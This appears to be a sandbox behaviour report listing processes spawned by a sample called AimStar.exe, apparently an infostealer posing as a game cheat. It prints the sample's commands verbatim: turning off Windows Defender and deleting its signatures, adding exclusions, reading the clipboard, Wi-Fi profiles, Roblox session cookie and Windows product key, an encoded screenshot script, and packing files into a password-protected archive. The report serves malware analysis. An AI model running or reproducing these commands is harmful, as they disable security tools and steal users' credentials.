Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior

Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Users\user\Desktop\AimStar.exe "C:\Users\user\Desktop\AimStar.exe"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1C05.tmp" "c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
